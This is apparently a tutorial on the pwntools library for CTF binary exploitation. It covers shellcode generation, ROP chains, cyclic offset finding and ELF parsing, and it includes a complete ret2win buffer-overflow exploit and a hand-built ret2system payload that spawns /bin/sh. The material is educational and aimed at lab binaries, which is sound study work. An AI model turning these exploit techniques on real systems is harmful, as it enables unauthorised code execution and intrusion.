Pwntools for CTF Binary Exploitation
Binary exploitation is one of the most challenging yet rewarding categories in Capture The Flag competitions. While understanding the underlying vulnerabilities is crucial, having the right tools can make the difference between solving a challenge and hitting a wall. Enter pwntools, the Python library that has become the de facto standard for CTF binary exploitation.
What is Pwntools?
Pwntools is a CTF framework and exploit development library written in Python. It provides a clean, intuitive API for common exploit development tasks like process interaction, shellcode generation, ROP chain building, and more. Whether you're exploiting a local binary or attacking a remote service, pwntools streamlines the workflow.
Installation
Getting started is straightforward:
pip install pwntools
For the latest development version:
git clone https://github.com/Gallopsled/pwntools
cd pwntools
pip install -e .
Core Features
Process Interaction
The most basic use case is interacting with processes. Pwntools makes this trivial:
from pwn import *
# Local process
p = process('./vulnerable_binary')
# Remote connection
r = remote('ctf.example.com', 1337)
# Send and receive data
p.sendline(b'A' * 100)
data = p.recv(1024)
p.interactive() # Drop into interactive mode
Shellcode Generation
Need shellcode? Pwntools has you covered. Keep in mind that asm() shells out to the binutils assembler for the target architecture, so cross-architecture targets need the matching binutils installed:
from pwn import *
# execve("/bin/sh") shellcode for the current context.arch (i386 unless you set it)
shellcode = asm(shellcraft.sh())
# Set the architecture explicitly, or reach for an arch-specific template
context.arch = 'amd64'
shellcode_64 = asm(shellcraft.amd64.linux.sh())
ROP Chain Building
Return-Oriented Programming is the standard answer to a non-executable stack (NX): instead of injecting code, you chain short instruction sequences that already exist in the binary and end in ret. Pwntools includes a powerful ROP module that finds those gadgets and lays out the chain for you:
from pwn import *
elf = ELF('./binary')
rop = ROP(elf)
# Find gadgets and build the chain for system("/bin/sh").
# 'system' must be resolvable through the binary (PLT or symbols); otherwise
# build the chain against a libc ELF with its base address set.
rop.call('system', [next(elf.search(b'/bin/sh'))])
payload = b'A' * 72 + rop.chain() # 72 = distance from buffer start to saved return address
Two caveats: rop.chain() is packed for the architecture of the ELF you passed in, and on amd64 glibc's system() expects a 16-byte-aligned stack, so if the chain crashes inside system() on a movaps instruction, prepend a lone ret gadget (ROP.find_gadget can locate one) before the call.
Packing and Unpacking
Converting between integers and bytes is constant in exploitation:
from pwn import *
# Fixed-width packers: p32/p64 always emit 4/8 bytes and respect context.endian
# (little-endian by default); pack()/unpack() pick the width from context.bits
address = p64(0xdeadbeef) # 64-bit
address = p32(0xcafebabe) # 32-bit
# Unpack data: 8 little-endian bytes back into an int (0xdeadbeef here)
value = u64(b'\xef\xbe\xad\xde\x00\x00\x00\x00')
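To show what ROP(elf).call and the packing helpers do under the hood, here is an added example (written for this page; it is neither pwntools code nor code from the original article). It scans a constructed amd64 .text blob for gadget byte patterns, packs 64-bit words with struct exactly as p64/u64 do, and assembles the padding + ret + pop rdi; ret + "/bin/sh" + system layout that rop.call produces for a ret2system call. The load address 0x401000, the segment bytes, the offset 72 and the system/"/bin/sh" addresses are all assumptions made for the example.

```python
import struct

# Constructed sample of an amd64 .text segment (not from any real binary), with an
# assumed load address. The comments show the instructions the bytes decode to.
TEXT_BASE = 0x401000
TEXT = (
    b"\x55\x48\x89\xe5"        # push rbp; mov rbp, rsp
    b"\x48\x83\xec\x10"        # sub rsp, 0x10
    b"\x5d\xc3"                # pop rbp; ret          (a bare ret lives at +9)
    b"\x41\x5f\xc3"            # pop r15; ret          (+1 decodes as pop rdi; ret)
    b"\x90\x90\xc3"            # nop; nop; ret
)

# Byte encodings of the gadgets we need. ROP tools look for these patterns at every
# byte offset, not only at instruction boundaries, which is why the "pop rdi; ret"
# hiding inside "pop r15; ret" counts as a gadget (an unintended one).
GADGETS = {
    "pop rdi; ret": b"\x5f\xc3",
    "ret": b"\xc3",
}


def p64(value):
    """Pack a 64-bit little-endian integer (what pwntools' p64 does)."""
    return struct.pack("<Q", value)


def u64(data):
    """Unpack 8 little-endian bytes into an int (what pwntools' u64 does)."""
    return struct.unpack("<Q", data)[0]


def flat(*parts):
    """Concatenate bytes as-is and pack ints as 64-bit words (a minimal flat())."""
    return b"".join(p64(x) if isinstance(x, int) else x for x in parts)


def find_gadgets(text, base, pattern):
    """Return the address of every occurrence of a gadget's bytes in text."""
    found = []
    off = text.find(pattern)
    while off != -1:
        found.append(base + off)
        off = text.find(pattern, off + 1)
    return found


def build_ret2system(offset, system_addr, binsh_addr, text=TEXT, base=TEXT_BASE):
    """Build padding + ret + pop rdi; ret + &"/bin/sh" + &system.

    The leading ret gadget re-aligns RSP to 16 bytes before system() runs; glibc
    uses movaps on the stack early in system(), which faults if RSP is misaligned
    (the classic cause of a ret2libc chain that "should" work but segfaults).
    """
    pop_rdi = find_gadgets(text, base, GADGETS["pop rdi; ret"])[0]
    ret = find_gadgets(text, base, GADGETS["ret"])[0]
    chain = [ret, pop_rdi, binsh_addr, system_addr]
    return flat(b"A" * offset, *chain)


if __name__ == "__main__":
    # Assumed addresses for system@plt and a "/bin/sh" string in the binary.
    payload = build_ret2system(72, system_addr=0x401046, binsh_addr=0x402004)
    for i in range(72, len(payload), 8):
        print("payload[%d:%d] = %#x" % (i, i + 8, u64(payload[i:i + 8])))
```

Real tools disassemble each candidate rather than pattern-matching two bytes, but the scan above is enough to show where gadget addresses come from and why the chain is just packed integers laid out in the order the CPU will pop them.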
Practical Example: Buffer Overflow
Here's a complete ret2win exploit for a classic stack buffer overflow. It assumes the binary is not PIE and contains a win function, so the function's address can be read straight from the symbol table (for a PIE binary you would first need a leak to set elf.address):
from pwn import *
# Set up the target; context.binary sets arch, bits and endianness from the ELF,
# so flat() packs the address with the right width
elf = ELF('./vuln')
context.binary = elf
p = process('./vuln')
# Offset from the start of the buffer to the saved return address
# (72 here; the cyclic pattern section shows how to measure it)
offset = 72
# Build exploit
payload = flat(
    b'A' * offset,
    elf.symbols['win'] # Jump to win function
)
p.sendline(payload)
p.interactive()
Advanced Features
Cyclic Patterns
Finding offsets is easier with cyclic patterns: send a de Bruijn sequence instead of 'A' * N, and the bytes that land in the instruction pointer identify the offset directly. On amd64 a non-canonical value never makes it into RIP, so read the pattern bytes from RSP (or the low bytes of RBP) in the debugger instead:
from pwn import *
# Generate a pattern in which every 4-byte window is unique
pattern = cyclic(200)
# After the crash, look up the faulting value (EIP on i386) to get the offset;
# cyclic_find also accepts the raw bytes, e.g. cyclic_find(b'qaaa')
offset = cyclic_find(0x61616171) # 'qaaa' -> 64
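The pattern behind cyclic() is a de Bruijn sequence: over the 26-letter alphabet with 4-byte windows, one period of 26**4 bytes contains every 4-byte window exactly once, which is what makes the lookup unambiguous. The following is an added example, not pwntools' own implementation (it uses the same FKM construction and alphabet, so the offsets agree with pwntools' defaults); the little-endian handling of integer arguments and the reduction of a 64-bit register value to its low 4 bytes are assumptions made for this example.

```python
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield the de Bruijn sequence B(k, n) over alphabet, one byte at a time.

    Every length-n window occurs exactly once per period of k**n bytes, so any
    n consecutive bytes recovered from a crash pin down a unique offset. This is
    the FKM (Lyndon word) construction; the output starts "aaaabaaacaaad...".
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern (same output as pwntools cyclic(length))."""
    return bytes(islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(subseq, n=4):
    """Offset of an n-byte window in the pattern, or -1 if it never occurs.

    An int is treated as a register value read from the crash and packed
    little-endian, so 0x61616171 becomes b"qaaa" (assumption: matches pwntools'
    default little-endian context). A wider value, e.g. a full 64-bit RSP word
    on amd64, is reduced to its low n bytes, which are the first n bytes of the
    window as it sits in memory.
    """
    if isinstance(subseq, int):
        subseq = (subseq & ((1 << (8 * n)) - 1)).to_bytes(n, "little")
    if len(subseq) != n:
        raise ValueError("subsequence must be exactly %d bytes" % n)
    window = bytearray()
    for i, byte in enumerate(de_bruijn(ALPHABET, n)):
        window.append(byte)
        if len(window) > n:
            del window[0]
        if window == subseq:
            return i - n + 1
    return -1


if __name__ == "__main__":
    print(cyclic(40))
    print(cyclic_find(b"qaaa"), cyclic_find(0x61616171))
```

The amd64 case is the one worth remembering: after a crash with RSP pointing into the pattern, pass the 8-byte value at RSP (read with x/gx $rsp in gdb) and the low 4 bytes still resolve to the right offset, because little-endian storage puts the first byte of the window in the lowest byte of the value.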
ELF Parsing
Pwntools can parse ELF binaries and extract useful information. For a PIE binary the addresses below are file-relative until you set elf.address to the leaked load base:
from pwn import *
elf = ELF('./binary')
print(hex(elf.symbols['main'])) # function address (or offset, for PIE)
print(hex(elf.got['puts'])) # GOT slot: where the resolved libc address is stored
print(hex(elf.plt['system'])) # PLT stub: a callable address for an imported function
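To see where values like elf.arch, elf.entry and the PIE flag come from, here is an added example (hand-written for this page, not pwntools' ELF class) that parses the ELF64 file header with struct and reports whether the binary is position independent, which decides whether symbol addresses are usable as-is. It builds its own constructed 64-byte header as sample input, so it runs without a real binary; the field layout and constants follow the ELF specification.

```python
import struct

# ELF constants (from the ELF specification / <elf.h>)
ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB, ELFDATA2MSB = 1, 2
ET_EXEC, ET_DYN = 2, 3
MACHINES = {0x03: "i386", 0x3e: "amd64", 0x28: "arm", 0xb7: "aarch64"}

# Elf64_Ehdr fields that follow the 16-byte e_ident: e_type, e_machine, e_version,
# e_entry, e_phoff, e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize,
# e_shnum, e_shstrndx (48 bytes, so the whole header is 64 bytes)
EHDR64 = "HHIQQQIHHHHHH"


def parse_elf_header(data):
    """Parse an ELF64 header and return the facts an exploit writer needs first."""
    if len(data) < 64 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[4] != ELFCLASS64:
        raise ValueError("only ELF64 is handled here")
    endian = "<" if data[5] == ELFDATA2LSB else ">"
    (e_type, e_machine, _version, e_entry, e_phoff, e_shoff, _flags, _ehsize,
     _phentsize, e_phnum, _shentsize, e_shnum, _shstrndx) = struct.unpack(
        endian + EHDR64, data[16:64])
    return {
        "arch": MACHINES.get(e_machine, "unknown(%#x)" % e_machine),
        "endian": "little" if endian == "<" else "big",
        "type": {ET_EXEC: "EXEC", ET_DYN: "DYN"}.get(e_type, str(e_type)),
        # ET_DYN executables are position independent: symbol addresses in the
        # file are offsets until the leaked base is added (elf.address in pwntools)
        "pie": e_type == ET_DYN,
        "entry": e_entry,
        "phoff": e_phoff,
        "phnum": e_phnum,
        "shoff": e_shoff,
        "shnum": e_shnum,
    }


def make_elf64_header(e_type, e_entry, e_machine=0x3e):
    """Constructed little-endian ELF64 header used as sample input (not a real binary)."""
    ident = ELF_MAGIC + bytes([ELFCLASS64, ELFDATA2LSB, 1, 0, 0]) + b"\x00" * 7
    return ident + struct.pack("<" + EHDR64, e_type, e_machine, 1, e_entry,
                               64, 0, 0, 64, 56, 0, 64, 0, 0)


if __name__ == "__main__":
    # A PIE-style header (ET_DYN, low entry point) next to a fixed-address one
    for sample in (make_elf64_header(ET_DYN, 0x1040), make_elf64_header(ET_EXEC, 0x401040)):
        info = parse_elf_header(sample)
        print("%s %s entry=%#x pie=%s" % (info["arch"], info["type"], info["entry"], info["pie"]))
```

The check that matters in practice is the PIE flag: a ret2win payload built from elf.symbols['win'] works directly against an ET_EXEC binary, but against an ET_DYN one the same number is only an offset and the exploit needs a leak first.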
Logging
Built-in logging makes debugging easier. Note that log.error does more than print: it raises a PwnlibException and stops the script, so reserve it for conditions the exploit cannot recover from:
from pwn import *
log.info("Starting exploit...")
log.success("Shell spawned!")
log.warning("ASLR detected")
log.error("Exploit failed") # raises PwnlibException; nothing after this line runs
Best Practices
Set Context Early: Always configure your target architecture and OS at the start, since packing, shellcraft and ROP all read from context (setting context.binary to the target ELF fills these in from the binary's headers):
context.arch = 'amd64'
context.os = 'linux'
Use Templates: Create reusable exploit templates for common scenarios.
Debug Mode: Enable debugging to see all communication:
context.log_level = 'debug'
Test Locally First: Always test exploits against local binaries before attacking remote targets, and for libc-dependent exploits make sure the local libc matches the version the remote service runs, since offsets differ between builds.
Conclusion
Pwntools transforms binary exploitation from tedious byte manipulation into expressive Python code. Its extensive feature set handles the boilerplate, letting you focus on the vulnerability itself. Whether you're a CTF beginner or seasoned player, mastering pwntools will significantly boost your binary exploitation capabilities.
The library is actively maintained, well-documented, and has a strong community. Start with simple buffer overflows, then progress to ROP chains, format strings, and heap exploits. With pwntools in your arsenal, you'll be pwning challenges in no time.
Resources:
- Official Documentation: https://docs.pwntools.com
- GitHub: https://github.com/Gallopsled/pwntools
- CTF Wiki: https://ctf-wiki.org